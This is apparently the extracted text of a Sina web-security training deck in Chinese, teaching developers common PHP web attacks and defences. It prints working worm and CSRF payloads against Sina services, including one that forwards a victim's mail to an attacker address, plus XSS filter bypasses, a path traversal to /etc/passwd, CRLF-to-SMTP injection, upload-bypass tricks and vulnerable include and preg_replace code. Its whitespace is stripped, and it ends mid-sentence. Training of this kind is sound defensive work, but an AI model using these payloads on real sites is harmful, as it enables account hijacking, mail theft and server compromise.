新浪web安全培訓(xùn)課件

內(nèi)容簡介 1.知己知彼,百戰(zhàn)不殆 2.解析黑客手中的利器 3.捍衛(wèi)代碼城堡 4.劍走偏鋒 5.驚栗后的深思 6.雙劍合壁新浪WEB安全培訓(xùn)ver.2

互聯(lián)網(wǎng)攻擊趨勢(統(tǒng)計(jì)來自)腳本安全編程重要性腳本安全編程重要性1.知己知彼，百戰(zhàn)不殆WEB攻擊流程WEB攻擊流程

2.解析黑客手中的利器黑客攻擊技術(shù)曝光一、腳本黑客的瑞士軍刀--SQL注入攻擊 1.猜解出數(shù)據(jù)庫中的敏感信息 2.如果連接權(quán)限高的話會得到文件操作權(quán)限 (load_file,intooutfile) 3.根據(jù)數(shù)據(jù)庫特性執(zhí)行系統(tǒng)命令黑客攻擊技術(shù)曝光二、暗夜中舞動的精靈--XSS跨站腳本攻擊 1.進(jìn)行會話劫持 2.CSRF 3.XSSWORM 4.社會工程攻擊、釣魚、拒絕服務(wù) 5.涂鴉頁面xss特點(diǎn)

繼承瀏覽器權(quán)限

社會工程，被動攻擊

影響廣泛(只要瀏覽器支持JavaScript)

隱蔽，難以察覺XSS可能出現(xiàn)在哪？ 1.HTML標(biāo)簽外部 2.HTML標(biāo)簽內(nèi)部(屬性、事件) 3.輸入到j(luò)avascript代碼黑客攻擊技術(shù)曝光百度XSS蠕蟲攻擊統(tǒng)計(jì)黑客攻擊技術(shù)曝光新浪博客v5.0蠕蟲

varblogtitle="IOwNedyouRBloG" varblogbody="You\'rEmYfOOd.<br><ahref=\"\">蠕蟲傳播主體,不要構(gòu)造這里</a>" varxmlhttp=newActiveXObject("Msxml2.XMLHTTP.3.0"); xmlhttp.open("GET","/admin/article/article_add.php",false); xmlhttp.send(); varxss=xmlhttp.responseText; token=xss.indexOf("vtoken"); if(token>0) { vtoken=xss.substr(token+15,32); xmlhttp.open('post','/admin/article/article_post.php',false); xmlhttp.setRequestHeader('Content-Type','application/x-www-form-urlencoded'); xmlhttp.send('album=&blog_id=&is_album=0&stag=&sno=&channel_id=&url=&channel=&newsid=&book_worksid=&vtoken='+vtoken+'&is_media=0&blog_title='+blogtitle+'&blog_body='+blogbody+'&tag=&blog_class=0&x_cms_flag=1&sina_sort_id=117&is2bbs=1&join_circle=1'); varsuss=xmlhttp.responseText; send=suss.indexOf("06001"); if(send>0) { //alert("感染成功:)"); document.location="/";}else{ alert("感染失敗:("); } }黑客攻擊技術(shù)曝光新浪空間好友紙條群發(fā)蠕蟲 '獲取cookie中的uid cookie=unescape(request("cookie")) cflag=Instr(cookie,"nick=") dflag=Instr(cookie,");") …省略…….. '遍歷好友數(shù) fori=1to500 '得到此uid的好友 url="/friend/list.php?uid="&uid&"&page="&i&"&pagesize=1" xml.open"GET",url,False xml.send htmlcon=b2bstr(xml.responsebody) '提取好友uid aflag=Instr(htmlcon,"{""record"":[{""uid"":""") bflag=InStr(htmlcon,""",""ftype""") Ifaflag<>0Andbflag<>0Then okflag=Replace(Replace(mid(htmlcon,aflag,bflag),"{""record"":[{""uid"":""",""),"""","") Else '超過最大好友數(shù)就中斷 exitfor EndIf 'playload Response.Write"<iframesrc=message.asp?uid="&okflag&"width=""700""height=""30"“frameborder=""no""border=""0""marginwidth=""0""marginheight=""0""scrolling=""no"“allowtransparency=""yes"">“ next黑客攻擊技術(shù)曝光永無止境的斗爭--XSS過濾&突破BaiduXSS過濾繞過a{evilmask:ex/*exp/**/ression*/pression……}

SinaXSS過濾繞過(input) /bar.php?name=+"style="xss:expression(alert(document.cookie));“ Sourecode:<inputtype=hiddenname=namevalue=""style="xss:expression(alert(document.cookie));"">黑客攻擊技術(shù)曝光新浪圈子--Html標(biāo)簽內(nèi)部進(jìn)攻黑客攻擊技術(shù)曝光被污染的頁面代碼：<DIVclass=list_inside><IMGstyle="WIDTH:auto;star:auto"src="JaVaScrIpT:eval(unescape('xss%3D%22reply_floor省略部分代碼alert%28xmlhttp.responseText%29%3B'));">aaa</DIV></TD></TR></TBODY>黑客攻擊技術(shù)曝光新浪VIP郵箱CSRF攻擊<XMLID="xss"><I><B><IMGSRC="javas<!---->cript:eval(unescape('xmlhttp%3Dnew%20ActiveXObject%28%22Msxml2.XMLHTTP.3.0%22%29%3Bxmlhttp.open%28%22GET%22%2C%22/classic/setforward.php%3Foptype%3D1%26is_open%3D1%26Forward_To%3Dmengzhuo@%26Forward_Save%3Don%22%2Cfalse%29%3Bxmlhttp.send%28%29%3Bvar%20a%3D%28xmlhttp.responseText%29%3Bdocument.write%28%22I%20Miss%20You%20%20from%20FengGou%20%3A%29%22%29%3B'));"></B></I></XML> <SPANDATASRC="#xss"DATAFLD="B"DATAFORMATAS="HTML"></SPAN>黑客攻擊技術(shù)曝光黑客攻擊技術(shù)曝光XSS重組攻擊先進(jìn)后執(zhí)行 /*</script> */(‘hi’);/* */alert/* <script>/*黑客攻擊技術(shù)曝光三、千里之堤，毀于蟻穴--PHP文件包含漏洞

服務(wù)器通過php的特性（函數(shù)）去包含任意文件時(shí)，由于要包含的這個(gè)文件來源過濾不嚴(yán)，從而可去包含一個(gè)惡意文件，而我們可以構(gòu)造這個(gè)惡意文件來達(dá)到攻擊的目的。

黑客攻擊技術(shù)曝光文件包含 $file=$_GET["file"]; include($file); include('/config/'.$file);路徑包含 $path=$_GET["path"]; include($path.'/config.php');黑客攻擊技術(shù)曝光黑客攻擊技術(shù)曝光VulnCode: $fp=fopen($url,'r'); fpassthru($fp);黑客攻擊技術(shù)曝光四又1/2、文件名操作函數(shù)引發(fā)的血案—CRLF PHP的fopen(),file()及其它函數(shù)存在一個(gè)缺陷，即用戶隨意地添加額外HTTP報(bào)頭信息到HTTP請求數(shù)據(jù)包中。攻擊者可以利用此缺陷繞過服務(wù)器的安全限制，進(jìn)行非法訪問。在某些情況下，這個(gè)缺陷甚至可以打開任意的網(wǎng)絡(luò)連接，在代理端執(zhí)行PHP腳本和打開郵件轉(zhuǎn)發(fā)。

黑客攻擊技術(shù)曝光doc.php?url=http%3A%2F%2F%3A25%2F+HTTP/1.0%0D%0AHELO+%0D%0AMAIL+FROM%3A%3Cmengzhuo@%3E%0D%0ARCPT+TO%3A%3Cxxx@%3E%0D%0ADATA%0D%0ACRLF+is+here%0D%0A.%0D%0AQUIT%0D%0A%0D%0Aurl=:25/+HTTP/1.0 HELO+ MAIL+FROM:<mengzhuo@> RCPT+TO:<xxx@> DATA CRLF+is+here . QUIT黑客攻擊技術(shù)曝光GET/HTTP/1.0

HELO

MAILFROM:<mengzhuo@>

RCPTTO:<xxx@>

DATA

CRLFishere

.

QUIT

HTTP/1.0

Host::25

……黑客攻擊技術(shù)曝光Warning:fopen(http://...@>RCPTTO:<mengzhuo@>DATACRLFishere.QUIT)[function.fopen]:failedtoopenstream:HTTPrequestfailed!220--ServerESMTP(SunJavaSystemMessagingServer6.2-3.04(builtJul152005))in/opt/lampp/htdocs/doc.phponline3雖然測試由于一些原因失敗，但是已經(jīng)證明了攻擊的存在性黑客攻擊技術(shù)曝光黑客攻擊技術(shù)曝光五、飛向光明之巔--文件上傳攻擊 1.直接獲取webshell 2.WEB系統(tǒng)瞬間淪陷，直接威脅服務(wù)器安全黑客攻擊技術(shù)曝光惡意PHP文件上傳方法 1.精心構(gòu)造后綴 (php3,PhP,php.) 2.構(gòu)造文件類型Content-Type 3.截?cái)喑绦蛄鞒?(shell.php%00.jpg) 4.服務(wù)器解析缺陷 (test.php.rar)黑客攻擊技術(shù)曝光黑客攻擊技術(shù)曝光危險(xiǎn)的本地JS檢查 functionisAllowedAttach(sFile) { varsUploadImagesExt=".jpg.gif.png"; varsExt=sFile.match(/\.[^\.]*$/); if(sExt){ sExt=sExt[0].toLowerCase(); }else{ …… if(!isAllowedAttach(file)){ show_error("上傳圖片格式不正確","upinfo"); returnfalse; }黑客攻擊技術(shù)曝光六、沒有硝煙的戰(zhàn)爭--黑客攻擊的藝術(shù) 1.淘金(html,js注釋,備份文件,服務(wù)器報(bào)錯信息) 2.猜測文件與目錄 3.其他人留下的漏洞 4.社會工程 5.0day 6....真的這么簡單嗎？在保證代碼安全的前提下還要有風(fēng)險(xiǎn)對抗意識。如果攻擊者已經(jīng)得逞，如何將損失、數(shù)據(jù)泄露、權(quán)限流失保證到最低限度。黑客攻擊技術(shù)曝光3.捍衛(wèi)代碼城堡捍衛(wèi)代碼城堡代碼安全的本質(zhì)--惡意數(shù)據(jù)來自哪里？1.顯示變量輸入

$_GET$_POST$_COOKIE$_SESSION$_SERVER...2.隱式輸入

來自于數(shù)據(jù)庫

來自于配置文件

來自于緩存文件 ...

捍衛(wèi)代碼城堡捍衛(wèi)代碼城堡什么是敏感字符? SQL注入:id=1'and'1'='1 id=1and1=2unionselect1,2,3….. XSS:<script>alert()</script> “><imgsrc=#onerror="javascript…… Include:vuln.php?path=../../../etc/passwd vuln.php?path=http://xxx/s.jpg%3f捍衛(wèi)代碼城堡由此可見，敏感字符沒有固定的形式與樣子，取決于黑客攻擊的目標(biāo)的特性.對于SQL注入，過濾單引號(字符型)，整形處理(數(shù)字型)，與一些常用SQL關(guān)鍵字(select,update,and,or...)，那將對SQL注入技術(shù)給予致命的打擊！過濾<>，那么對于防范html標(biāo)簽外的XSS攻擊可以說是徹底的。捍衛(wèi)代碼城堡SQL注入過濾方法

常用變量字符替換函數(shù)str_replace()

字符轉(zhuǎn)義函數(shù)addslashes()

常用數(shù)字判斷函數(shù)is_numeric(),is_int()...捍衛(wèi)代碼城堡XSS跨站攻擊解決方法XSS是輸出到頁面的內(nèi)容，如果仍然過濾會打亂用戶無意提交的敏感字符組成的文章，所以這里推薦轉(zhuǎn)義HTML轉(zhuǎn)義函數(shù):htmlentities(),htmlspecialchars()會把<轉(zhuǎn)義成<,>轉(zhuǎn)義成>,這樣顯示的內(nèi)容不變,而且惡意標(biāo)簽已經(jīng)失去意義捍衛(wèi)代碼城堡但是！切記??！XSS沒有我們想象的簡單，XSS不僅僅存在與html中，它可能存在與CSS中，錯誤的HTTP頭中，cookies中，F(xiàn)lash中，甚至是一張圖片中...捍衛(wèi)代碼城堡捍衛(wèi)代碼城堡It'saGoodidea~局限法 selectname,passfromuserwhereuid='$id'; <inputvalue="xxx">看上面的例子，將用戶的輸入局限在一對單引號或者雙引號中,然后過濾掉單引號和雙引號,防止用戶截?cái)嗪葱l(wèi)代碼城堡當(dāng)然，WEB安全也不僅僅是過濾，嚴(yán)謹(jǐn)?shù)倪壿嬎季S更重要，看一個(gè)案例新浪房產(chǎn): POST/yh1/zhuce/mebermanage.phpHTTP/1.1 …省略HTTP頭信息… mbflag2=2&mebname=[admin]&mbpwd=123456&mbpwd2=123456&mbemail=[xss]&Submit3=%CC%E1%BD%BB捍衛(wèi)代碼城堡文件包含\文件操作類漏洞的解決 1.控制本地讀取的路徑(小心"../"進(jìn)行目錄跳出) 2.控制遠(yuǎn)程讀取的路徑(http://xxx/xxx) 3.最根本還是控制文件名變量的形態(tài)！捍衛(wèi)代碼城堡利用PHP本身對抗文件操作進(jìn)攻 allow_url_fopen=Off (禁止打開遠(yuǎn)程文件鏈接) allow_url_include=Off (禁止遠(yuǎn)程包含文件) open_basedir=/opt/www (禁止指定目錄外的文件操作) safe_mode=On (PHP將檢查當(dāng)前腳本的擁有者是否和被操作的文件的擁有者相同)捍衛(wèi)代碼城堡利用PHP本身對抗命令執(zhí)行進(jìn)攻 disable_functions=system(),passthru() (該指令接受一個(gè)用逗號分隔的函數(shù)名列表，以禁用特定的函數(shù))

如果你的程序不需要使用這些函數(shù)請禁掉，因?yàn)閣ebshell會經(jīng)常使用捍衛(wèi)代碼城堡利用PHP本身對抗字符注入進(jìn)攻 magic_quotes_gpc=On (檢查來自GET/POST/Cookie的數(shù)據(jù)并自動轉(zhuǎn)義敏感字符) It\'sverycool轉(zhuǎn)義VS過濾選擇那個(gè)？轉(zhuǎn)義后的敏感字符會導(dǎo)致程序處理流程出錯，最后將錯誤顯示到頁面。捍衛(wèi)代碼城堡捍衛(wèi)代碼城堡守口如瓶--不能說的秘密php執(zhí)行錯誤報(bào)錯的信息一些人看起來不算什么，但是對于一個(gè)黑客來說，也許是罪惡的開始。 1.暴露數(shù)據(jù)庫結(jié)構(gòu) 2.暴露物理路徑捍衛(wèi)代碼城堡Warning:include()[function.include]:Failedopening''forinclusion(include_path='.:/opt/lampp/lib/php')in/opt/lampp/htdocs/path.phponline3display_errors=Off (關(guān)閉錯誤回顯)4.劍走偏鋒劍走偏鋒不得不承認(rèn)，在這個(gè)網(wǎng)絡(luò)安全亂世，黑客平民化的網(wǎng)絡(luò)時(shí)代中，安全已經(jīng)遠(yuǎn)遠(yuǎn)沒有想象中的那么簡單。攻擊者的目光已經(jīng)不在那些沒有安全處理的變量上，而是向這些正常程序函數(shù)或安全處理機(jī)制下了毒手。黑客的必殺技？！劍走偏鋒不想突破的黑客不是好黑客--GPC的繞過在PHP5中，$_SERVER變量不再受其保護(hù)，導(dǎo)致攻擊者可以把單引號、雙引號和空字元帶入程序 $_SERVER['HTTP_X_FORWARDED_FOR'] $_SERVER['HTTP_REFERER'] $_SERVER['QUERY_STRING']劍走偏鋒GPC的繞過請求 GET/gpc.php?a=sina'HTTP/1.0 Accept:*/* Accept-Language:zh-cn Accept-Encoding:gzip,deflate Host:8 Connection:Keep-Alive X-Forwarded-For:'Sina'' Referer:'Sina''劍走偏鋒劍走偏鋒魔高一尺--幽靈般的XSS繞過技術(shù)htmlentities()真的是標(biāo)簽XSS終結(jié)者？xss.php?xss=%2bADw-SCRIPT%2bAD4-alert(/xss%20is%20here!/)%2bADw-%2fSCRIPT%2bAD4-utf7+urlencodeandother….劍走偏鋒道高一丈--毛骨悚然SQL注入繞過技術(shù)Addslashes()真的是字符型SQL注入的終結(jié)者？注意user的值:SELECT*FROMuserWHEREuser='籠'sinaadmin'ANDpass='sinaadmin'GBK中0xbb27不是合法的雙字節(jié)字符(中文),0x27相當(dāng)于('),被轉(zhuǎn)義成0xbb5c27(/'),但是0xbb5c是一個(gè)合法的中文字符，由此注入了一個(gè)0x27(')。Page66Page67Page68劍走偏鋒十面埋伏--preg_replace()中的陷阱+/e執(zhí)行漏洞 Preg_repace當(dāng)?shù)谝粋€(gè)參數(shù)的正則表達(dá)式參數(shù)有e符號的時(shí)候，第二個(gè)參數(shù)的字符串當(dāng)做PHP代碼執(zhí)行。

<?php $h=$_GET['h']; echopreg_replace("/test/e",$h,"onlyatest"); ?>劍走偏鋒變量中轉(zhuǎn)攻擊

通過表達(dá)式提取p